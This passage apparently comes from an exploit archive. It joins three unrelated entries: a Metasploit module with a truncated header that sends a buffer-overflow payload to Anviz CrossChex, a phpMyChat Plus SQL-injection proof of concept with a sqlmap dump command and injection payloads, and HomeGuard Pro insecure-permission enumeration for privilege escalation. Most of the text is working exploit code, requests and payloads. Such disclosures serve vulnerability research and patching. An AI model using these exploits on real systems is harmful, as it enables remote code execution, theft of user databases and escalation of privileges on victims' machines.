  Rank = NormalRanking
  PACKET_LEN = 10

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
'Name'        => 'Anviz CrossChex Buffer Overflow',
'Description'  => %q{
        Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
        triggering a stack buffer overflow.
      },
'Author'      =>
        [
'Luis Catarino <lcatarino@protonmail.com>',  # original discovery/exploit
'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>',   # original discovery/exploit
'agalway-r7',  # Module creation
'adfoster-r7' # Module creation
        ],
'License'      => MSF_LICENSE,
'References'  =>
        [
            ['CVE', '2019-12518'],
            ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
            ['EDB', '47734']
        ],
'Payload'        =>
        {
'Space'    => 8947,
'DisableNops' => true
        },
'Arch' => ARCH_X86,
'EncoderType' => Msf::Encoder::Type::Raw,
'Privileged'  => true,
'Platform' => 'win',
'DisclosureDate' => '2019-11-28',
'Targets'        =>
          [
            [
'Crosschex Standard x86 <= V4.3.12',
              {
'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
'Shift' => 4 # Positions payload to be written at beginning of ESP
              }
            ]
          ],
'DefaultTarget'  => 0
      ))
    deregister_udp_options
    register_options(
        [
            Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
            Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
            OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
        ])
  end

  def exploit
    connect_udp

    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
    if res.empty?
      fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
    end

    print_status "CrossChex broadcast received, sending payload in response"
    sploit = rand_text_english(target['Offset'])
    sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
    sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
    sploit << payload.encoded

    udp_sock.sendto(sploit, host, port)
    print_status "Payload sent"
    end
end

# Title: phpMyChat Plus 1.98 - 'pmc_username' SQL Injection
# Date: 2020-02-13
# Exploit Author: J3rryBl4nks
# Vendor Homepage: http://ciprianmp.com/latest/
# Software Link: https://sourceforge.net/projects/phpmychat/files/phpMyChat_Plus/
# Version MyChat Plus 1.98
# Tested on Windows 10/Kali Rolling

# The phpMyChat Plus 1.98 application is vulnerable to Sql Injection 
# (Boolean based blind, Error-based, time-based blind) on the deluser.php page 
# through the pmc_user parameter.

# POC code:
# Capture the request through Burpsuite:

POST /plus/deluser.php HTTP/1.1
Host: HOSTNAME
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://HOSTNAME/plus/deluser.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: close
Cookie: CookieLang=english; temp=temp; CookieUsername=testing; CookieRoom=Public%2BRoom%2B1; CookieRoomType=1; CookieStatus=r; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9
Upgrade-Insecure-Requests: 1

L=english&Link=&LIMIT=0&pmc_username=test&pmc_password=test&login_form=Log+In


# Then use sqlmap to get the user tables:

sqlmap -r deleteuserlogin.req --level=5 --risk=3 --dbms=mysql --tamper=unmagicquotes -D DBNAME --dump -T c_reg_users -p pmc_username

Parameter: pmc_username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND 9736=(SELECT (CASE WHEN (9736=9736) THEN 9736 ELSE (SELECT 2847 UNION SELECT 9983) END))-- qEHq&pmc_password=test&login_form=Log In

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: L=english&Link=&LIMIT=0&pmc_username=test' OR (SELECT 7708 FROM(SELECT COUNT(*),CONCAT(0x7170627a71,(SELECT (ELT(7708=7708,1))),0x7162627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ShDx&pmc_password=test&login_form=Log In

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: L=english&Link=&LIMIT=0&pmc_username=test' AND (SELECT 5588 FROM (SELECT(SLEEP(5)))wWnk)-- FHPh&pmc_password=test&login_form=Log In

# Exploit Title: HomeGuard Pro 9.3.1 - Insecure Folder Permissions
# Exploit Author: boku
# Date: 2020-02-13
# Vendor Homepage: https://veridium.net
# Software Link: https://veridium.net/files_u/hg-pro/exe/HomeGuardPro-Setup.exe
# Version 9.3.1
# Tested On: Windows 10 (32-bit)

# HomeGuard Pro v9.3.1 - Unquoted Service Path + Insecure Folder/File/Service Permissions

## Service Information (Unquoted Service Path)
C:\>wmic service get Name,PathName,StartMode,StartName | findstr /v "C:\Windows" | findstr /i /v """
Name            PathName                                       StartMode    StartName
HG52 AM VI      C:\Program Files\HomeGuard Pro\vglset.exe      Auto         LocalSystem
HG52 AMC        C:\Program Files\HomeGuard Pro\vglsetw.exe     Auto         LocalSystem
HG52 AM REM     C:\Program Files\HomeGuard Pro\vglrem.exe      Auto         LocalSystem
HG52 AM SRV     C:\Program Files\HomeGuard Pro\vglserv.exe     Auto         LocalSystem

## Insecure Folder Permission
C:\>icacls "C:\Program Files\HomeGuard Pro" | findstr /i "Users"
C:\Program Files\HomeGuard Pro               BUILTIN\Users:(F)

## Insecure File/Service Permission
C:\>icacls "C:\Program Files\HomeGuard Pro\VGL*" | findstr /i "Users"
C:\Program Files\HomeGuard Pro\vglrem.exe    BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\VGLSERV.EXE   BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\vglset.exe    BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\vglsetw.exe   BUILTIN\Users:(I)(F)